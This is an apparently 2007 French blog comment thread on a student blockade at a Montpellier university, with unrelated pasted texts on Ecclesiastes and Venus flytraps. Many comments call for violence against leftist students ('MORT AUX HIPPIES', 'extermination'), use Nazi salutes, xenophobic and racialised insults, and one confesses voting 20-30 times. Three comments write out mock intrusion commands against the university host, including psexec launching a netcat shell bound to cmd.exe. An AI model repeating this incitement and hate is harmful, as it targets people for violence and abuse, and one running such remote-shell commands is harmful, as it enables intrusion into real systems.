Ca va cogner dur, le droit d'etudier existe et on va le faire valloir, vous etes 40 à bloquer on est + de 10 000 a etre contre ce blocage. Si y'a moyen de casser du hippies, j'y cours à 7h demain.
En esperant que les crs nous apportent leur précieuse aide dans notre extermination des étudiants gauchistes.

Anonyme a dit…

Bon j'avoue, moi et des potes on a décidé de voter 20-30 fois chacun au referendum (ils n'y ont vu que du feu, vu le bordel !).
Donc maintenant vous arretez vos conneries, la loi est de notre coté, vous n'y pouvez rien :)

Anonyme a dit…

MAIS FERMEZ VOS GUEULE AVEC VOS IDEOS A LA CON BANDE DE FILS DE RUELLES

Anonyme a dit…

Paroles de l'Ecclésiaste, fils de David, roi de Jérusalem.

Vanité des vanités, dit l'Ecclésiaste, vanité des vanités, tout est vanité.

Quel avantage revient-il à l'homme de toute la peine qu'il se donne sous le soleil?

Une génération s'en va, une autre vient, et la terre subsiste toujours.
Le soleil se lève, le soleil se couche; il soupire après le lieu d'où il se lève de nouveau.

Le vent se dirige vers le midi, tourne vers le nord; puis il tourne encore, et reprend les mêmes circuits.

Tous les fleuves vont à la mer, et la mer n'est point remplie; ils continuent à aller vers le lieu où ils se dirigent.

Toutes choses sont en travail au delà de ce qu'on peut dire; l'oeil ne se rassasie pas de voir, et l'oreille ne se lasse pas d'entendre.

Ce qui a été, c'est ce qui sera, et ce qui s'est fait, c'est ce qui se fera, il n'y a rien de nouveau sous le soleil.

S'il est une chose dont on dise: Vois ceci, c'est nouveau! cette chose existait déjà dans les siècles qui nous ont précédés.

On ne se souvient pas de ce qui est ancien; et ce qui arrivera dans la suite ne laissera pas de souvenir chez ceux qui vivront plus tard.

Anonyme a dit…

C'est gerbant toute cette violence...Bon, ben Miossec & Co ont gagné finalement : diviser pour mieux régner, y a que ça de vrai...les étudiants s'entretuent par commentaires interposés, et les CRS, tout comme les névropathes avides de baston, n'auront plus qu'à parachever le travail à coup de latte... M'est avis qu'on l'a tous dans le c** et profond, bloqueurs, anti-bloqueurs, pacifistes, enragés, engagés, désengagés, nains de jardin et tutti quanti...

Anonyme a dit…

rep a patrik

Heil !

On va enfin pouvoir casser du bolchevicks !
Moi je suis montpellierain de naissance, et je veux virer tout les etrangers qui viennent bloquer MA fac !!
Avec moi tout les anti-bloqueur, levez la main !!

HEIL MEIN FUHRER !


Tu peux dire que tous les anti blokeur sont des nazi
MAIS CEUX QUI ON CITE HITLER SUR LES PAVES A L'ENTREE DE LA FAC CE SONT LES BLOKEURS KON VOIT A L'OEUVRE SUR L'ARTICLE SUIVANT!!!!!!!!

Anonyme a dit…

Les pauvres sont pauvres parce qu'il le veulent bien ..et vous bande de rakail si vous voulez pas faire des études universitaires vous trouverez bien un ti Job de rue alors soit vous vous vous conformé aux règles ou vous vous effacez !!
Bloque pas ma Fac

Anonyme a dit…

MORT AUX HIPPIES

Anonyme a dit…

Ben moi comme je suis pour l'unité et la paix et l'amour je vous embrasse tous parce que nous sommes tous frères et soeur.
bisous bien baveux
faisons tous l'amour dans un frégidaire!

Anonyme a dit…

BORDEL DEMAIN ON PART EN COUILLE!!!

Anonyme a dit…

Pourquoi dans un frigidaire ????????????????????????????????????????????????????????????

Anonyme a dit…

BLOQUEURS, SALES HIPPIES
ANTI BLOQUEURS, SALES NAZIS
MIOSSEC... SALE HIPPIE NAZI !
CRS... SS !!
SARKOZY... NAZI !!!
youpi. avec toutes ces étiquettes, on va bientôt ouvrir un supermarché !

Anonyme a dit…

Kadinium j'te baise pas avec tes chveux sales et tes rats! Die Hippies!
Sale sales !

Anonyme a dit…

Putain franchement, voir tous ces commentaires de fils à papa pourris gatés complètement imbus d'eux-même qui veulent "casser du hippie" ça donne vraiment pas envie de soutenir les anti-bloqueurs... Vive l'intolérance de droite...

Anonyme a dit…

Allez les bloqueurs, une tisane, pipi, et au lit, demain vous vous levez tôt, pourquoi déjà? à oui, POUR NOUS BLOQUER!!!!!!

Anonyme a dit…

moi perso aprés tout ça, ça m'fou un peu la gerbe de me pointer à la fac et de savoir que je vais y cotoyer des gens aussi méchants, aussi cons, il faut le dire, pour souhaiter casser la gueule de bloqueurs, putain! c'est dingue cette violence que vous crachez à la gueule des gens( celà dit,à l'abri, le cul bien calé devant vos pc m'enfin...) mais c'est pas à la fac que vous devriez aller, rentrez chez vous et demandez à vos parents de vous éduquez de vous apprendre ce que c'est le respect...

Anonyme a dit…

les frigidaires ca nous forcent à etre plus entreprenant pr se rechauffer

Anonyme a dit…

Putain franchement, voir tous ces commentaires de fils à papa pourris gatés complètement imbus d'eux-même qui veulent "casser du sarkoziste" ça donne vraiment pas envie de soutenir les bloqueurs... Vive l'intolérance de gauche...

Anonyme a dit…

Juste pour faire un petit best of. Au moins j'ai bien rigolé pendant cette soirée. Merci à vous.

Ca va du jeu de mot très fin

"Salut les copains!
Bloque ma fac et j'te débloque la face ! "

Au débat très profond
"MOI J AIMERAIS QUE QUELQU UN ME DISE SI ON PEUT ETRE BLOQUEUR ET DANSER LA TECKTONIK. VOILA C TOUT"

"Non on ne peut pas être blokeur é tektonikeur
tektonik tudanse sur e lelectro musik faite a partir de machine machine ki représente el capitalisme!C mort pr toi
Meme si létoile du tektonikeur pouré passé pr une étoile comuniste je doute ke staline oré aimé le rose é ns devon respecté sa façon de voir les choses!"

Aux revendications intéressantes

"LIBERATION DES NAINS DE JARDIN!!!!!!!!"

A la dénonciation

"Et moi je veux le précurseur du curling.
J'veux un coupable."

A des révélations fulgurantes

"BANDE DE PUCEAUX PUCELLES"

Bref, merci à vous, et merci à Chuck Norris.

Anonyme a dit…

Alors c kan tu veux !!!!!!



LoL

Anonyme a dit…

Vous pouvez continuer votre action de merde, j'en ai rien à foutre!!!!!
Moi, ce soir je suis avec Carla Bruni et je vous....

Anonyme a dit…

Camarade bourgeois,
camarade fils-à-papa,
la Triumph en bas d'chez toi,
le p'tit chèque en fin de mois,
regarde-toi ah ah ah
regarde-toi ah ah ah

Camarade bourgeois,
camarade fils-à-papa,
t'as vraiment pas l'air con,
quand tu sors le dimanche
ton petit complet-veston
et ta chemise blanche.
regarde-toi ah ah ah
regarde-toi ah ah ah

Camarade bourgeois,
camarade fils-à-papa,
tu roules en Ferrari
ou en Lamborghini,
tu roules des épaules,
tu te crois super-drôle,
regarde-toi ah ah ah
regarde-toi ah ah ah

Camarade bourgeois,
camarade fils-à-papa,
je sais, ton père est patron,
faut pas en faire un complexe,
le jour d'la révolution,
on lui coupera qu'la tête.
regarde-toi ah ah ah
regarde-toi ah ah ah

Camarade bourgeois,
camarade fils-à-papa,
tu passes ton temps au drugstore
sur les Champs-Elysées
tu te crois très très fort,
t'es jamais qu'un minet.
regarde-toi ah ah ah
regarde-toi ah ah ah

Camarade bourgeois,
camarade fils-à-papa,
rejoins les rangs de la pègre,
tu prendras vraiment ton pied,
ne sois plus une petite pède,
nous sommes tous des défoncés,
regarde-moi ah ah ah
regarde-moi ah ah ah
regarde-moi ah ah ah
regarde-moi ah ah ah

Anonyme a dit…

ben moi demain jvai buy les KDO de noel comme ca jvais me levé a midi tranquille merci les gens :) c'est grace a vous tous ca :)

Anonyme a dit…

mmm cherrii ?
Je crois que la france est en feu...
..ou Marianne fait le 100 metre haie ?

http://www.abrutis.com/photos/yvttbovv.jpg

(ca a l'air d'etre plus qu'une revolte...)

++

Anonyme a dit…

Je suis bloqueur. Je bloque.

Anonyme a dit…

Bon allez les gens !!!
Pour moi cendrillon est passée
J'ai pas envie de finir en citrouille

Bonne nuit

PS: a demain
peut-etre que j'en retrouverais certains coincé entre 1 CRS ou 1 antibloqueur ou 1 bloqueur

Anonyme a dit…

moi m'en foue je passerai par la cheminée !!

Anonyme a dit…

je suis anti bloqeur,jte débloque.

Anonyme a dit…

AH oui Toi t'es tryo et tu bloques? et si on te dit d'aller te jetter, tu te jettes?
Tous des moutons de Paturge, vous savez même plus pourquoi vous bloquez.....

Anonyme a dit…

Panurge dsl! ;)

Anonyme a dit…

Lille 3 : «le blocage total est mortifère»

ÉDUCATION - Une AG pleine à craquer. Des gens debout en haut de l'amphi, et sur les côtés. Des étudiants passent dans les rangs et comptent, rangée par rangée, les pour, les contre. La fac de sciences humaines de Lille 3 a voté à main levée, en début d'après midi, à une grosse majorité, le blocage «ponctuel» de l'université.

Le blocage ponctuel, c'est un blocage limité à un jour par semaine. L'idée? «Empêcher qu'arrive ce que la ministre désire c'est à dire le pourrissement», justifie Nathalie Beauvois professeur de Lettres. Un étudiant estime que le blocage «monte les étudiants les uns contre les autres». Un autre qu'«il était pertinent au début, mais il est devenu mortifère pour le mouvement et pour l'université. On n'est pas plus de 500 en manifs». Il réclame des manifs plus espacées, la création d'un comité de vigilance, et des actions symboliques, comme des «baptêmes d'amphi» (l'amphi A a été appelé amphi EDF). Une étudiante déplore que plus de mille personnes votent le blocage, mais que seuls une quarantaine d'étudiants sont là pour le faire vivre. Quelqu'un propose d'inonder de fax, de courriers et de coups de fil les services de Valérie Pécresse.

L'AG a également voté la demande de démission de Jean-Claude Dupas, président de l'université, pour protester contre l'envoi des CRS jeudi après-midi, le déblocage pour les M1 pro qui partent en stage en janvier, pour qu'ils puissent passer leurs examens. Elle demande au conseil d'administration d'afficher les chiffres du budget détaillé de l'université.

Sans surprise, la proposition de rebaptiser l'Université Charles De Gaulle Lille 3 en... Université «Philippe Pétain» pour protester contre l'intervention des CRS n'a pas été retenue.

H.S.

A venir, un débat mardi 18, à 14h30, amphi A sur la Loi sur la responsabilité des universités. Avec des enseignants-chercheurs, des étudiants et Jean Fabbri, secrétaire général du Snesup.
c'etait sur liberation.fr je trouve que c'est franchement pas con vous croyez pas. Vouloir faire la révolution empèche pas de la faire intelligement.( une anti-bloqueuse anti-LRU qui rêve de pourrir les soirées du petit nabot que la grande dame qu'est Carla Bruni a décidé de se farcir ( elle devait etre bourrée ce jour-là))

Anonyme a dit…

Mouton de Paturge hé connard!!!apprends à écrire!!

Anonyme a dit…

C'est toi le mouton anonyme, quel prenom de chiotte.

Anonyme a dit…

Courage aux bloqueurs !

Anonyme a dit…

LIBERATION DES NAINS DE JARDIN!!!!!!!

Anonyme a dit…

Zarma ! Tu le veux mon beau ptit cul de black ?

Anonyme a dit…

Je compte soutenir le blocage demain et à 7h si il le faut ce s'rait pour savoir quels sont vos plans d'action??savoir si on est vraiment organisé!!
parsque pas envie d'arriver là bas et de voir que finalement on est même pas une vingtaine!!
merci!

Anonyme a dit…

Le Stupeflip C.R.O.U. ne mourra jamais

Anonyme a dit…

Que tout le ministre gagne un salaire de bases et non excessif et qu’il n'augmente pas à leur bon vouloir
Que la nouvelle loi ne porte pas leur Nom
C’est quoi cette société ou c'est un parti politique qui fixe les règles du jeu

Pourquoi quand se sont les professeurs les pompiers, les étudiants, les avocats etc. le gouvernement reste muet alors que dans leur intimité politique ils gagnent des salaires exorbitants et ont droit à tout plein d'avantage

Anonyme a dit…

Hi guys!
I'm an english student, i'm stuck in montpellier since 2 months and this fucking university is still closed. What's wrong with you guys ?
My parents give a lot of money in my study and that's not really great for a stranger like me.
Please use your bloody brain and go to school.

Anonyme a dit…

Allez, bonne nuit tout le monde, trop de violence, tue la violence ;)
Vous vous faites du mal pour rien.
Si vous vous étiez trouvés devant les uns les autres, jamais vous auriez prononcé de telles paroles.
Faites baisser la pression, tout ceci est inutile à mon sens....

Bonne nuit, et faites de beaux rêves quand même....

Anonyme a dit…

net use \\univ-montp3.fr\admin$ /user:miossec himler

La commande s'est terminée correctement.


psexec \\univ-montp3.fr c:\windows\system32\hidden-huhu\nc.exe
-L -p 666

La commande s'est terminée correctement.


telnet univ-montp3.fr 666...

Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Miossec>portail -blocked

La commande s'est terminée correctement.

C:\Documents and Settings\Miossec>anti-blocage -set mode fucked

La commande s'est terminée correctement.

quit

Anonyme a dit…

Salut à vous chers étudiants!

Je trouve certains propos tenus sur ce blog complètement choquant et déplacés, comme par exemple ceux de Minato Namikaze qui à été l'un des premiers àa réagir!

"Vous n'irez pas en cours. On vous en empechera. Si vous voulez nous passer sur le corps je vous conseille de venir bien armé car nous, nou serons bien préparés, je peux vous l'assurer."

J'ai l'impession que c'est la guerre en Irak!
En tout cas le principe est le même: une instance qui s'en fout vous regarde pour déchirer dans une lutte dont vous ignorez les raisons!
Eh puis c'est d'assez drôle d'entendre certains parler de solidarité et de démocratie ... uniquement lorsque ça les arrange!

"On y sera des 7 heures tapantes. Pour bloquer les entrées avec des chaises et des tables.
Nous vaincrons.
Une AG sera toujours plus légitime qu'un vote policier et tronqué."

Il est vrai que lorsqu'on critique la légitimité d'un vote qui a brassé 3000 étudiants et qu'on veut rétablir les choses, on se réunit en petit comité pour voter le reblocage à 80 votes contre 67...

Vous demandez au gouvernement d'abroger une loi que vous contestez parcequ'elle n'est pas un moyen efficace pour régler les soucis des étudiants alors que vous n'êtes même pas capable à votre petit niveau de reconnaître que votre mode d'action est inefficace et qu'il vous fait, vous aussi l'abandonner et passer à autre chose pour régler le problème!

Vous êtes pathétiques!

Anonyme a dit…

Franchement, je trouve vos réactions minable ste honteuses. Vous parlez de vous tabasser, vous vous insulter à tout va! Elle ets belle l'image de la france et des étudiants que vous prétendez défendre! Pas étonnant que le sprofs et le sgens neutres qui assistent à la joute aient pitié de vous et trouvent que vous discréditez vous-même votre mouvement (pour ou contre d'ailleurs)! Vous ne savez même plus pour quoi vous vous battez! A votre place je ne saurais plus où me mettre devant tant de conneries !

Anonyme a dit…

Le marchand de sable... a dit...
Allez, bonne nuit tout le monde, trop de violence, tue la violence ;)
Vous vous faites du mal pour rien.
Si vous vous étiez trouvés devant les uns les autres, jamais vous auriez prononcé de telles paroles.
Faites baisser la pression, tout ceci est inutile à mon sens....

Bonne nuit, et faites de beaux rêves quand même....

si c'est pas mimi ça!!
va te coucher!! nous on va s'occuper de ton avenir ignorant va!!

Anonyme a dit…

Ecoute Changement...
j'aurais pu être caissier, mais je me suis rendu compte que les DRH gagnaient mieux leur vie, alors j'ai décidé de devenir DHR!
Alors si tu envie le salaire des politiques, arrête tes jérémiades, boucle la et devient politique!

Anonyme a dit…

si c'est pas mimi ça!!
va te coucher!! nous on va s'occuper de ton avenir ignorant va!

MERCI pour ton aide, mais je m'occupe très bien de mon avenir tout seul, et tu devrais t'aider toi-même, ça te rendrait peut-être plus aimable....

Anonyme a dit…

====[Session Begin]====


net use \\univ-montp3.fr\admin$ /user:miossec himler

La commande s'est terminée correctement.


psexec \\univ-montp3.fr c:\windows\system32\hidden-huhu\nc.exe
-L -p 666 -e c:\windows\system32\cmd.exe

La commande s'est terminée correctement.


telnet univ-montp3.fr 666...

Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Miossec>portail -blocked

La commande s'est terminée correctement.

C:\Documents and Settings\Miossec>anti-blocage -set mode fucked

La commande s'est terminée correctement.

quit

====[/Session End]====

Anonyme a dit…

xaxaxaxaxa....josie...go back to your home..!!..so your...parents will not pay for you...xaxaxaxaxaxaxa...god blesh you..oyu made me laughing.. Je suis une étudiante étranger aussi, et je supporte les grévistes..et je suis pour !!..en ce qui concerne la DEMISSION!!! de miossec .

Anonyme a dit…

Vous me donnez envie de gerber avec vos grands idéaux, vous qui restez chez vous comme des collabo et laissez les crs agir à votre place parce que le courage de vos opinions vous manque ! Anti-bloqueurs, vous faites pitié ...

Anonyme a dit…

divisé pour mieux régner ..quel belle preuve avant yavais les bloqueurs et les pacifistes maintenant
il y as les bloqueurs et les anti bloqueurs
ce n'est pas le bloqueur qui refuse le LRU et qui milite qui faut blamer
mais celui qui bloque pour bloquer et qui en n'a rien à foutre du LRU ni de ceux qui defendent leur convictions

Franchement Les AG ainsi que les blocages aurè pu se passé dans de meilleur conditions
si l'ensemble de la communauté Etudiante de Paul VALERY étè convaincu que se qui se passe en AG soit crédible..

Avant je fesait la différence entre blocage et violence maintenant c'est la même chose
vous applé plus les gens à defendent leur ideo mais à faire des emeutes

Anonyme a dit…

Quelle perte d'energie sur ce blog, des jérémiades, des disputes puériles, des insultes d'ado rebelles et quelques post de temps en temps, intéressants, mais auxquels personne ne répond... Car au lieu de réfléchir, de penser à une solution pour les deux parties, vous gaspillez votre énergie...

"La colère n'a rien de grand ni de noble. Il n'y a vraiment grand que ce qui, en même temps, est calme."
[Sénèque]

Anonyme a dit…

====[Session Begin]====

open univ-montp3.fr 667

[R] En train de se connecter à univ-montp3.fr -> DNS=univ-montp3.fr IP=193.52.136.235 PORT=667
[R] Connecté à univ-montp3.fr
[R] 220 Serv-U FTP Server v6.4 for WinSock ready...
[R] USER Miossec
[R] 331 User name okay, need password.
[R] PASS (hidden)
[R] 230 User logged in, proceed.
[R] site exec "Secretaire.en.bikini.XXX-FRENCH.XViD-TESORO.avi"
[R] exec successfully
[R] QUIT
[R] 221 Goodbye!
[R] Déconnecté: univ-montp3.fr
====[/Session End]====

Anonyme a dit…

Je suis calme..et je dis que.. bloqueurs et anti-bloqueurs doivent unir leurs forces contre jm miossec! DEMISSION!!!

Anonyme a dit…

merci pour avoir posté enfin un commentaire intelligent anonyme de 00:49 ! ça fait plaisir de voir un peu de culture dans ce blog gorgé d'insultes, d'inepties et de haine. Surtout que les principaux concernés ne font même pas attention aux réponses et propositions des gens calmes et censés !

Anonyme a dit…

''Le sommeil est pour l'ensemble de l'homme ce que le remontage est à la pendule''
Arthur Schopenhauer

Anonyme a dit…

Enfin de la vie !
On commencait a ne plus respirer, dans les formes figées de cette société !
La norme emprisonne, le blocage (a-normal) angoisse donc naturellement tout le monde, et sort la populasse de sa torpeur !

peu importe les réponses, tant que les questions affluent, merci les bloqueurs !
Toute cette violence n'est que le résultat de l'aliénation sociale, enfin sortie de ses canaux !
Les commentaires sont stupides ? peu importe l'Histoire avance.

++

Anonyme a dit…

"Hi guys!
I'm an english student, i'm stuck in montpellier since 2 months and this fucking university is still closed. What's wrong with you guys ?
My parents give a lot of money in my study and that's not really great for a stranger like me.
Please use your bloody brain and go to school."




Quelle bande de mythos.

Un vrai anglais aurait écrit "I've been stuck in montpellier for 2 months"
et non pas "i'm stuck in montpellier since 2 months". Fautes digne d'un collégien de 4ème.

Un vrai anglais aurait écrit "my parents give out a lot of money FOR my studIES" and non pas "My parents give a lot of money in my study



"i went to france because some of my friends told me it was cool...so what? every fuckin'weeks some dickheads locked up the univ...YOU TWAT !
It would never happened in UK...you screwed my year thank you very much sucker"

Un vrai anglais aurait écrit. "It would never HAVE happened in THE UK"

et non pas "It would never happened in UK"

Un vrai anglais aurait écrit "you screwed UP my year" et non pas "you screwed my year"





Retourne te coucher, boulet.

Anonyme a dit…

zero< Dialectique< Prof< Arthur Schopenhauer < < Anonyme(2)< Anonyme(1)< Anonyme(ø)

Anonyme a dit…

Les plantes carnivores

Dionaea (Droseraceae)


Le genre Dionaea comprend une espèce unique (Dionaea muscipula Ellis.). Sa répartition est limitée à l'Amérique du Nord, dans la seule région à la limite du sud de la Caroline du Nord et du nord de la Caroline du Sud. (aire discontinue sur un territoire de 45000 km2). Cette espèce est en régression. Elle pousse sur des sols pauvres en sels minéraux, où l'eau est généralement accessible aux racines. Comme de nombreuses plantes carnivores, elle supporte mal la concurrence. En revanche, elle se développe bien sur des sols soumis à des feux fréquents.

La Dionée, un exemple de piége actif à mâchoires.
La rapidité avec laquelle le piège de la Dionée se ferme a attiré très tôt l'attention. Reprenant des observations faites avant lui, Charles Darwin (1875) a expérimenté sur la Dionée.
La surface de la feuille est beaucoup moins sensible au choc, ce qui permet de la manipuler sans qu'elle se ferme.
Le piège au repos apparaît comme une paire de mâchoires grandes ouvertes au point d'offrir à la vue une surface horizontale. Il est garni de dents à la périphérie. La nervure médiane apparaît comme une charnière autour de la laquelle les mâchoires s'articulent. En fait ce sont les modifications au sein des mâchoires qui jouent le rôle déterminant dans le mouvement des pièges. La nervure médiane ne joue pas le rôle d’un gond.
Sur chacune des mâchoires du piège, 3 poils rigides sont insérés. La base rétrécie du poil est constituée de cellules plus souples.

Vues de la plante entière.


Inflorescence et fleurs de Dionée

Phase 1 : phase rapide
Très tôt on a décrit plusieurs phases de fermeture.
Elle commence à la stimulation des poils sensibles. Chez un piège nouvellement actif, ne s'étant jamais fermé auparavant, la stimulation de celui-ci engendre des transformations. La face supérieure presque plane de chaque mâchoire devient concave et se rapproche de la mâchoire qui lui fait face. Les dents marginales rentrent en contact et deviennent intriquées. A travers la grille qu'ils forment on peut voir encore l'intérieur du piège.

Pour voir ce phénomène en vidéo


* séquence A : faible définition, 160x120 pixels, 96 KO
* séquence B : meilleure définition, 320x240 pixels, 1,4 MO.

A cette phase rapide succèdent d'autres phase plus lentes qui s'étalent sur plusieurs heures à plusieurs jours.
Phase 2
Dans les 5 à 30 minutes suivantes, l'espace entre les deux mâchoires disparaît.

Attention dans cette série les pièges photographiés peuvent appartenir à des feuilles différentes.
Phase 1

Phase 2

Phase 3
La bordure des mâchoires (qui maintenant se font face) s'applique étroitement sur quelques mm. Les dents marginales du bord du piège se redressent. L'absence ou la présence d'une proie digestible entraîne des modifications morphologiques du piège.

Piège en fin de fermeture
Phase 3

Après, la digestion, si elle a lieu, se déroule.

La libération d'enzymes est conditionnelle à la présence de certains stimulus chimiques.(Voir chapitre digestion)
Si le piége est vide ou s'il contient un objet indigeste comme une bille de verre, il n'y a pas de sécrétion de liquide. Le piége se rouvre en une journée environ.
En présence d'une proie digestible en contact avec les glandes digestives, un mucus est secrété qui joue le rôle d'un joint d'étanchéité. Les parois du piége s'appliquent étroitement contre la proie. La poche au cours de la digestion diminue de volume mais elle présente aussi des oscillations visibles lors de prise de vue en accéléré.

Piège fermé au cours de la digestion.

Le piège ne se rouvre qu'environ deux semaines plus tard.
A partir du stade de fermeture précédant on peut décrire l'ouverture du piège par une séquence inverse, liés à des phénomènes de croissance irréversible. Les parois deviennent plus convexes, les mâchoires s'écartent tout en restant jointives sur leurs marges. Puis les marges du piège s'écartent, les dents marginales sont encore contiguës. Enfin le piège s'ouvre.

Mécanismes possibles de fermetures du piége.
Les scientifiques se sont posés très précocement une série de questions. Quel est, ou quels sont les signaux que perçoivent la plante. Où ? Comment sont ils traduits pour permettre une transmission et aboutir à une série d'actions complexes (un mouvement extrêmement rapide de fermeture, puis, toujours dans ces phases de fermeture, une modification plus lente du piège. Dans le même temps, la plante distingue la présence ou l'absence de proie digeste ce qui déclenche ou non une sécrétion d'enzymes digestives (voir le chapitre digestion) . Enfin le piége se rouvre.

Lorsque le stimulus est un choc, Comment est il perçu, où ?

Dès 1873, des mesures de potentiel ont été effectuées parce qu’un signal électrique pouvait à priori expliquer la rapidité de la fermeture du piège. La fermeture rapide du piège est corrélée avec le déclenchement d'au moins deux potentiels d'action (PA). Ces variations de potentiels se propagent le long des mâchoires.

L'imbibition des pièges par une solution contenant l'ion Lanthane (La+++) (Hodick et Sievers 1989, Fagerberg 1991), qui est un inhibiteur des canaux calcium ou la perfusion des pièges par un puissant chélateur du calcium, anesthésie les pièges (Hodick et Sievers 1988,) ou encore l'emploi simultané d'un chélateur et d'un antagoniste des canaux calcium (Fagerberg 1996). Ceci suggère que le PA est déclanché par l'ouverture de canaux calcium sensible à des contraintes imposées à la membrane.

L'existence de membranes sensibles aux chocs a été démontrée chez des végétaux plus simples. Chez des Algues, des Characeae, on a pu démontrer que ces membranes sont sensibles aux stimulus mécaniques auxquelles elles répondent par un PA faisant intervenir des canaux Calcium et une augmentation de la concentration du cytoplasme en ions Ca++.
Au contact d'une proie, le poil se penche car les cellules constituant la base rétrécie de son pied sont souples et non recouvertes d'une cuticule épaisse.


Trois poils sensibles sur chacune des mâchoires du piège

Détail de la base rétrécie d'un poil sensible

Détail d'un poil sensible


Une seule stimulation modérée du poil ne suffit pas à déclencher la fermeture pour une température extérieure de l'ordre de 21°C (A 31°C il ne faut en général qu'une stimulation [Brown 1910]). Il est nécessaire que, dans les 20 secondes qui suivent, le même poil ou un autre poil sensible soit stimulé pour que le piège se ferme.)

En fait si on augmente l'intervalle de temps (Δt) entre deux stimulations d'un poil, on peut néanmoins déclencher une fermeture si l'on augmente le nombre de stimulations. Pour Δt = 60 s, il faut 5 stimulations pour obtenir une fermeture de 100% des feuilles stimulées. La fermeture dure alors 1s. Si Δt =20 minutes, il faut environ 15 stimulations pour que la fermeture commence et puis environ 1h30 pour qu'elle soit achevée (Brown 1916). Il a été suggéré que la nécessité de plusieurs PA pour une fermeture rapide traduit le fait qu'un seul PA ne libère pas assez d'ions Ca++ dans le cytoplasme. Ces ions calcium sont nécessaires aux réactions biochimiques aboutissant à un mouvement. Il faut en quelque sorte une confirmation d'un mouvement pour déclencher la fermeture. On peut imaginer que c'est une protection contre la fermeture à vide du piége. Le piége peut se fermer selon à des vitesses variables de 1/30ème de seconde à 3 secondes.

Comparaison de la sensibilité au choc du piège. Où est le récepteur ?
Si l'on considère la cellule avec sa paroi comme un tout, les cellules ont des sensibilités différentes. La surface du piège est peu sensible aux stimulations mécaniques à l'exception des poils sensibles. Les membranes de la base rétrécie des poils où les cellules présentent le moins de cuticule sont soumises à des tensions amplifiées par les mouvements de la partie rigide du poil sensible. (Benolken et Jacobson, 1970. Selon Hodick et Sievers (1989) la spécialisation du récepteur ne provient pas de particularité de la membrane plasmique. Cette étude montre que les potentiels d'actions des membranes des cellules des différents tissus du piége sont identiques (même amplitude, même durée dans le temps). La présence d'une cuticule épaisse, ou la situation en profondeur des cellules du mésophylle les protégent des chocs. Toutes les cellules des lobes du piége peuvent faire office de récepteur du stimulus mécanique mais la morphologie des poils sensibles et de leur base leurs fait jouer un rôle particulier, car un mouvement imposé à un poil provoque un étirement amplifié au niveau des cellules de la base de celui-ci.
D'autres stimulus provoquent la fermeture rapide du piège : des chocs sur les mâchoires, des piqûres, ainsi que des chocs thermiques localisés au piège.

Quel lien entre le potentiel d'action et la fermeture du piège? (perception, traduction, transmission,traduction, réponse)
La transmission de PA mesurables sur la surface des lobes du piège en font de bons candidats comme transmetteur de l'information.(Un objet bouge dans le piége, le piége doit se fermer).
On ne peut actuellement reconstituer la suite des événements qui aboutissent à la fermeture du piège bien que l'on connaisse ou suspecte des étapes.
Tous ces phénomènes sont difficiles à analyser à cause de la sensibilité du piège de la rapidité du mouvement de fermeture, de la difficulté de suivre l'évolution de la face interne (ventrale) du piège une fois celui-ci refermé et qu'une analyse des changements des cellules de l'intérieur du piège entraîne la destruction du piège.
Des méthodes d'études non destructives ont été employées conjointement à des méthodes destructives nécessaires pour étudier l’anatomie et la physiologie.

Les méthodes non destructives.
Des points sont régulièrement apposés sur les faces du piège. Le suivi des marques sur la face inférieure du piège (Brown, 1916, Hodick et Sievers, 1989) montre que la fermeture des pièges se traduit par un accroissement de la face inférieure des pièges, suivi d'un accroissement de la face supérieure lors de la réouverture. Ces accroissements se font principalement dans le sens perpendiculaire à la nervure médiane.
Fagerberg et Howe,(in Fagerberg, 1996) réalisent des empreintes des faces inférieures des pièges. Ces empreintes sont renouvelées au cours du temps. L'empreinte des cellules est mesurée. Les cellules de l'épiderme inférieur du piège croissent et décroissent, mais la taille des cellules ne change pas uniformément au cours de la fermeture puis de l'ouverture du piège.
Des études impliquant la destruction du piège ont mis en évidence d'autres phénomènes.

Les méthodes destructives.

Des variations de teneur en ATP

On constate qu'une à trois seconde après la fermeture du piège, la concentration en ATP chute au niveau de la nervure médiane (Jaffe, 1973) ainsi que celle des lobes (diminution de près de près de 30%) ( Williams et Bennett, 1982). Ces derniers auteurs, s'appuyant sur des expériences de modification du pH de la paroi, ont émis l'hypothèse que cette consommation d'ATP reflèterait le fonctionnement d'une pompe à proton qui jouerait un rôle dans la modification de la plasticité et la croissance de l'épiderme externe de la Dionée. Ce serait une croissance acide extrêmement rapide.

Des différences des propriétés d'extension des parois selon leur orientation par rapport à la nervure médiane.

D'autres auteurs (Hodick et Sievers, 1989), reprenant des expériences d'infiltrations de tampons de pH donnés dans les parois des pièges contestent cette hypothèse. Ils font remarquer que les expériences où il est imposé un pH donné aux parois se heurtent à l'imperméabilité des épidermes. La cuticule de l'épiderme supérieur est encore plus épaisse que celle de l'épiderme inférieur de la Dionée.
Afin d’anesthésier à un stade ouvert les pièges ces auteurs utilisent le chlorure de Lanthane qui bloque les canaux calcium ainsi qu'un chélateur de cet ion.
Afin de s'assurer que les pièges réagissent aux stimulations, les auteurs expérimentent sur des pièges s'étant déjà fermé une fois. Ils font plusieurs constatations.
Ils constatent que préalablement à la fermeture du piége, les tissus du cortex et de la moelle sont extensibles et sous tension. En effet que l'on retire l'épiderme supérieur ou inférieur d'un lobe du piège, le lobe se courbe du coté de l'épiderme intact.

Sur des piéges ouverts et anesthésiés, sur des pièges fermés, anesthésiés ou non, des bandes de piège contenant une partie du cortex et l’épiderme inférieur ou l’épiderme supérieur sont découpées perpendiculairement à la nervure médiane.

Les propriétés élastiques (réversibles) et plastiques (irréversibles) de la moitié inférieure et de la moitié supérieure de chacune de ces bandes sont mesurées. Sur les pièges ouverts, la face inférieure et la face supérieure ont la même extensibilité. Par contre, que le piège fermé soit anesthésié ou non, la moitié inférieure des piéges est 2 fois plus élastique que la moitié supérieure et, si l'on considère la plasticité, le rapport est de 7.
Des observations au microscope polarisant corrobore cette anisotropie [variation d'une propriété physique différente selon la direction considérée].
Au microscope polarisant alors que toutes les parois des cellules des tissus orientées parallèlement à la nervure médiane polarisent la lumière, il n'en n'est pas de même pour les cellules corticales et de la moelle, orientées perpendiculairement à celle-ci. Ceci traduit, selon les auteurs cités, le renforcement des parois des cellules dans le plan parallèle à la nervure.

Photomicrographies en lumière polarisée (polaroïdes croisés).
